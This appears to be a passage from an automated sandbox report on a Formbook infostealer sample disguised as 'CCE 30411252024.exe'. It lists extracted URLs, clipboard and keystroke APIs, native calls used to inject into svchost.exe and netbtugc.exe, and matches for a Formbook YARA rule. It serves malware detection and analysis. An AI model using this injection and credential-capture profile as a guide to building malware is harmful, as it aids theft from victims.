            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000006.00000003.2517133851.00000000077DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033;
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000006.00000002.4603587776.000000000099B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000006.00000002.4605259560.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.00000000046BA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR
            Source: netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000006.00000002.4605259560.000000000435E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4606811514.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F36B0C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F36D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F36D07
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F36B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F36B0C
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F22B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F22B37
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: 0_2_00F4F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F4F7FF

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\CCE 30411252024.exeCode function: This is a third-party compiled AutoIt script.0_2_00EE3D19
            Source: CCE 30411252024.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: CCE 30411252024.exe, 00000000.00000000.2141218806.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_3eda7f78-c
            Source: CCE 30411252024.exe, 00000000.00000000.2141218806.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f5f51cf8-2
            Source: CCE 30411252024.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_da16554d-d
            Source: CCE 30411252024.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d0371057-6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042B363 NtClose,2_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B60 NtClose,LdrInitializeThunk,2_2_03572B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03572DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03572C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035735C0 NtCreateMutant,LdrInitializeThunk,2_2_035735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574340 NtSetContextThread,2_2_03574340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03574650 NtSuspendThread,2_2_03574650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BF0 NtAllocateVirtualMemory,2_2_03572BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BE0 NtQueryValueKey,2_2_03572BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572B80 NtQueryInformationFile,2_2_03572B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572BA0 NtEnumerateValueKey,2_2_03572BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AD0 NtReadFile,2_2_03572AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572AF0 NtWriteFile,2_2_03572AF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572AB0 NtWaitForSingleObject, 2_2_03572AB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572F60 NtCreateProcessEx, 2_2_03572F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572F30 NtCreateSection, 2_2_03572F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572FE0 NtCreateFile, 2_2_03572FE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572F90 NtProtectVirtualMemory, 2_2_03572F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572FB0 NtResumeThread, 2_2_03572FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572FA0 NtQuerySection, 2_2_03572FA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572E30 NtWriteVirtualMemory, 2_2_03572E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572EE0 NtQueueApcThread, 2_2_03572EE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572E80 NtReadVirtualMemory, 2_2_03572E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572EA0 NtAdjustPrivilegesToken, 2_2_03572EA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572D10 NtMapViewOfSection, 2_2_03572D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572D00 NtSetInformationFile, 2_2_03572D00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572D30 NtUnmapViewOfSection, 2_2_03572D30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572DD0 NtDelayExecution, 2_2_03572DD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572DB0 NtEnumerateKey, 2_2_03572DB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572C60 NtCreateKey, 2_2_03572C60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572C00 NtQueryInformationProcess, 2_2_03572C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572CC0 NtQueryVirtualMemory, 2_2_03572CC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572CF0 NtOpenProcess, 2_2_03572CF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03572CA0 NtQueryInformationToken, 2_2_03572CA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03573010 NtOpenDirectoryObject, 2_2_03573010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03573090 NtSetValueKey, 2_2_03573090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_035739B0 NtGetContextThread, 2_2_035739B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03573D70 NtOpenThread, 2_2_03573D70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03573D10 NtOpenProcessToken, 2_2_03573D10
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E4340 NtSetContextThread, LdrInitializeThunk, 6_2_031E4340
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E4650 NtSuspendThread, LdrInitializeThunk, 6_2_031E4650
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2B60 NtClose, LdrInitializeThunk, 6_2_031E2B60
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2BA0 NtEnumerateValueKey, LdrInitializeThunk, 6_2_031E2BA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2BF0 NtAllocateVirtualMemory, LdrInitializeThunk, 6_2_031E2BF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2BE0 NtQueryValueKey, LdrInitializeThunk, 6_2_031E2BE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2AD0 NtReadFile, LdrInitializeThunk, 6_2_031E2AD0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2AF0 NtWriteFile, LdrInitializeThunk, 6_2_031E2AF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2F30 NtCreateSection, LdrInitializeThunk, 6_2_031E2F30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2FB0 NtResumeThread, LdrInitializeThunk, 6_2_031E2FB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2FE0 NtCreateFile, LdrInitializeThunk, 6_2_031E2FE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2E80 NtReadVirtualMemory, LdrInitializeThunk, 6_2_031E2E80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2EE0 NtQueueApcThread, LdrInitializeThunk, 6_2_031E2EE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2D10 NtMapViewOfSection, LdrInitializeThunk, 6_2_031E2D10
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2D30 NtUnmapViewOfSection, LdrInitializeThunk, 6_2_031E2D30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2DD0 NtDelayExecution, LdrInitializeThunk, 6_2_031E2DD0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2DF0 NtQuerySystemInformation, LdrInitializeThunk, 6_2_031E2DF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2C70 NtFreeVirtualMemory, LdrInitializeThunk, 6_2_031E2C70
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2C60 NtCreateKey, LdrInitializeThunk, 6_2_031E2C60
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2CA0 NtQueryInformationToken, LdrInitializeThunk, 6_2_031E2CA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E35C0 NtCreateMutant, LdrInitializeThunk, 6_2_031E35C0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E39B0 NtGetContextThread, LdrInitializeThunk, 6_2_031E39B0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2B80 NtQueryInformationFile, 6_2_031E2B80
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2AB0 NtWaitForSingleObject, 6_2_031E2AB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2F60 NtCreateProcessEx, 6_2_031E2F60
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2F90 NtProtectVirtualMemory, 6_2_031E2F90
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2FA0 NtQuerySection, 6_2_031E2FA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2E30 NtWriteVirtualMemory, 6_2_031E2E30
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2EA0 NtAdjustPrivilegesToken, 6_2_031E2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2D00 NtSetInformationFile, 6_2_031E2D00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2DB0 NtEnumerateKey, 6_2_031E2DB0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2C00 NtQueryInformationProcess, 6_2_031E2C00
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2CC0 NtQueryVirtualMemory, 6_2_031E2CC0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E2CF0 NtOpenProcess, 6_2_031E2CF0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E3010 NtOpenDirectoryObject, 6_2_031E3010
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E3090 NtSetValueKey, 6_2_031E3090
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E3D10 NtOpenProcessToken, 6_2_031E3D10
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_031E3D70 NtOpenThread, 6_2_031E3D70
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00547920 NtCreateFile, 6_2_00547920
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00547A70 NtReadFile, 6_2_00547A70
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00547B50 NtDeleteFile, 6_2_00547B50
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00547BE0 NtClose, 6_2_00547BE0
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 6_2_00547D30 NtAllocateVirtualMemory, 6_2_00547D30
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F26685: CreateFileW, DeviceIoControl, CloseHandle, 0_2_00F26685
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F1ACC5 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock, 0_2_00F1ACC5
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F279D3 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState, 0_2_00F279D3
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: String function: 00F0F8A0 appears 35 times
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: String function: 00EFEC2F appears 68 times
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: String function: 00F06AC0 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 035AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03587E54 appears 100 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0352B970 appears 275 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03575130 appears 56 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 035BF290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 0321EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 031F7E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 031E5130 appears 58 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 0322F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: String function: 0319B970 appears 275 times
Source: CCE 30411252024.exe, 00000000.00000003.2159355416.0000000003B7D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs CCE 30411252024.exe
Source: CCE 30411252024.exe, 00000000.00000003.2157797690.0000000003983000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs CCE 30411252024.exe
Source: CCE 30411252024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
